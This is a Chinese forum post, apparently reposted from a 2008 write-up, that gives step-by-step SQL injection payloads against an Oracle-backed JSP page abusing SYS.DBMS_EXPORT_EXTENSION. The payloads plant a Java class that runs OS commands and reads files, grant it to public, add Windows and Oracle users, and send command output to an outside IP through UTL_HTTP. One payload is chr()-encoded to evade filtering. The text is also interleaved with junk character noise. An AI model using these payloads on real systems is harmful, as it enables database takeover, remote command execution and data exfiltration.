以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
5 a: o4 {) I$ N7 \8 S. P: M |4 M! m
# h k* M4 N4 l8 X6 s" v /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
# m3 L( J# R! g3 F! l/ ^- q的形式即可。(用" 'a'|| "是为了让语句返回true值) ( Z. ?; P3 d) W' x$ H
语句有点长,可能要用post提交。 : S5 S1 d: V- X. ^' d+ q
以下是各个步骤:
, y1 o' e9 p1 B H Y- ?5 [; I1.创建包
8 A& I8 s: O1 Q! b( g( ]1 d, n V通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
. k4 `4 p( ?) O0 B4 y/xxx.jsp?id=1 and '1'<>'a'||( - Q( \" I# k2 _
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''- u1 G' W6 K* [. {2 b: f1 O
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
- ~; q: ]) F* I1 _' a- r3 t7 Cnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}' x3 g: g3 Z |( g" V9 c3 B
}'''';END;'';END;--','SYS',0,'1',0) from dual
o7 s2 K x5 Y. a' T- T! k/ `) / m5 O. U& W: G8 l
------------------------ 0 i- r/ ]/ L0 t! H9 H9 |
如果url有长度限制,可以把readFile()函数块去掉,即:
& |5 i7 j9 j6 [/ V3 {6 b/ @/xxx.jsp?id=1 and '1'<>'a'||(
, z8 q2 ?" |$ H$ M+ ^select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. Q1 O( h1 N; O$ C6 ]/ x; u& R' ^create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(5 ~( n6 W' u( F( j+ e
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}6 O& _- S" g" C- ]- A; h. H
}'''';END;'';END;--','SYS',0,'1',0) from dual
5 l2 \1 ~# U: D. x7 e" D$ L) 9 H) R4 s8 _% w: F7 ?: R
同时把后面步骤 提到的 对readFile()的处理语句去掉。 ' y) M/ I0 Q' \ ]! I" L' ^
------------------------------
0 ^& j* r; ], h6 F+ l4 ]2.赋Java权限 + E# M0 A7 ?4 Y6 ^; [7 x7 \1 H- B* k+ Y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual- [! M1 q$ c# w$ K
3.创建函数 1 m+ k: A% K& J* h2 _, v/ p' O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
# D7 m; u" ]3 \/ Ecreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual1 u7 `4 ?3 P5 G% J" [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
6 Q5 ` h; B2 Zcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
, @" R; I0 a$ I; |4.赋public执行函数的权限 ) \2 q. X' \/ r. P0 H- Y ?
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual' \/ u" Q1 d) j2 o
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual7 m$ J) d) k% Q# Z* _1 J
5.测试上面的几步是否成功
2 N; }/ ?8 J0 y" \$ S1 K; ?7 U; uand '1'<>'11'||( 8 m9 q8 L& `. B/ K3 x- o$ J0 \
select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
/ l+ @3 _0 V2 A. y- `' P6 I! v! I)
. ?8 }8 w1 \0 u9 C3 l: {and '1'<>(
) @0 M$ o6 n9 Q1 |select OBJECT_ID from all_objects where object_name ='LINXREADFILE' / i" o9 i0 I: H/ l& F
)
+ S3 ~9 u0 |* L& s3 z, \3 j. }6.执行命令:
- j4 Q: A: Z! @( I9 T/xxx.jsp?id=1 and '1'<>(
[; u- ^3 {" ?select sys.LinxRunCMD('cmd /c net user linx /add') from dual
: M' |( x2 u* E8 ^3 F' G1 }/ E6 {. t, O {. ?5 I* w
) / u/ Q4 U1 e% e r+ w' i: N( F
/xxx.jsp?id=1 and '1'<>(
) Z0 j# D2 K; a' |, dselect sys.LinxReadFile('c:/boot.ini') from dual& Q" `- v9 a! @" w4 U
8 J! `8 D; K) q) B7 X9 [8 @
)
; k7 B, o ?" N3 `- u' P# i3 ` , a+ _! {. a6 @$ r1 ~4 |' j* K
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 ! H& ]" Z" ~% c( f! g) H7 P7 R4 }
如果要查看运行结果可以用 union :
$ ^" i0 O% l, U1 G6 X4 d/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
. M: J2 o0 f U或者UTL_HTTP.request(:
* z; W; k! z" \5 g* [% E; x/ o( W/xxx.jsp?id=1 and '1'<>(
5 v) x( r' `# ~SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual$ ?( |; z# \, s/ L% X
)
+ }3 y* w: h* p6 H$ W3 V/xxx.jsp?id=1 and '1'<>(
6 i6 I9 H" v2 o3 ]& A- x! S6 eSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual2 C. W$ `. l. L) i
)
% H( u3 j, W: J+ y/ z) l6 q注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
, j% Y% s4 q, S, ~--------------------
; Y/ w9 H( V8 c D( N6.内部变化
: \* |) g' h2 m7 P) H; ~0 N4 r6 m通过以下命令可以查看all_objects表达改变: " x6 s9 o4 b9 D# t
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'
# h$ p& r2 _% U7 A) {2 g7 h! I7.删除我们创建的函数 * c5 c2 C! f4 f/ m
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''4 |7 a3 w0 f* c6 r1 s& x1 _! @: B$ u
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
2 z; k; A8 Q& A8 l3 H8 p8 I% F====================================================
+ u" l. w, ~2 v4 n全文结束。谨以此文赠与我的朋友。
0 }: D$ m) R- J8 w" Slinx / A, t( M1 A+ \( e
124829445 - k3 S( x2 x/ v1 ^8 t
2008.1.12
5 \ e. u1 E( l2 `* Clinyujian@bjfu.edu.cn
+ V! |2 ?! z1 k======================================================================
2 R4 k7 w2 r8 d& p测试漏洞的另一方法: * P3 Q3 V" \' Y5 x( B
创建oracle帐号: * G% l% f4 u9 R( c$ |& B
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 l8 q' V6 ^4 J; b
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual7 p& o, o5 F" s, F$ b
即: $ f/ I1 ?/ L: I; h1 E; Y9 q, D
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),% d# C* `4 H. D7 |% Q
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual - w* t& K2 K7 Y
确定漏洞存在:
( j8 o% w9 `7 @8 P1<>(
7 F- Z6 N! `8 f4 e7 xselect user_id from all_users where username='LINXSQL' 5 f V; Z1 H9 ]! \9 T4 [
)
3 ~% D' ?$ y5 q [6 W( {3 }给linxsql连接权限: L$ Q7 ^* i5 g' n" L6 X- G
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# _3 E7 t1 k% I, z
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
9 m6 w+ N( u: d% H0 B: y删除帐号: 4 s2 ?1 l) T; n' g
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 l- h! c# z3 e; N" B& O8 d' n
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual $ H# R( D/ ]9 g6 ~: @
======================
/ ^: J0 T0 @' p! |3 {6 v7 I3 i以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:. c/ l; f3 } k- a9 S: I
1.jsp?id=1 and '1'<>( - \" }. b/ g3 T/ Y, D# x
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 ]3 y/ D5 Y0 D; c
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
9 Y" x* ?) K# V8 i+ x/ |) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE0 K0 P$ `: H. n- ~! l, T+ s
)
) p; ]1 U1 ]& G: V# \! A: W6 ?6 q+ w: d! H" i# [" D" `
6 C o$ O% D* o3 x$ O
: H. q9 `4 ?0 X. r7 {
|
发表于 2012-12-18 12:21:48
收藏
支持
反对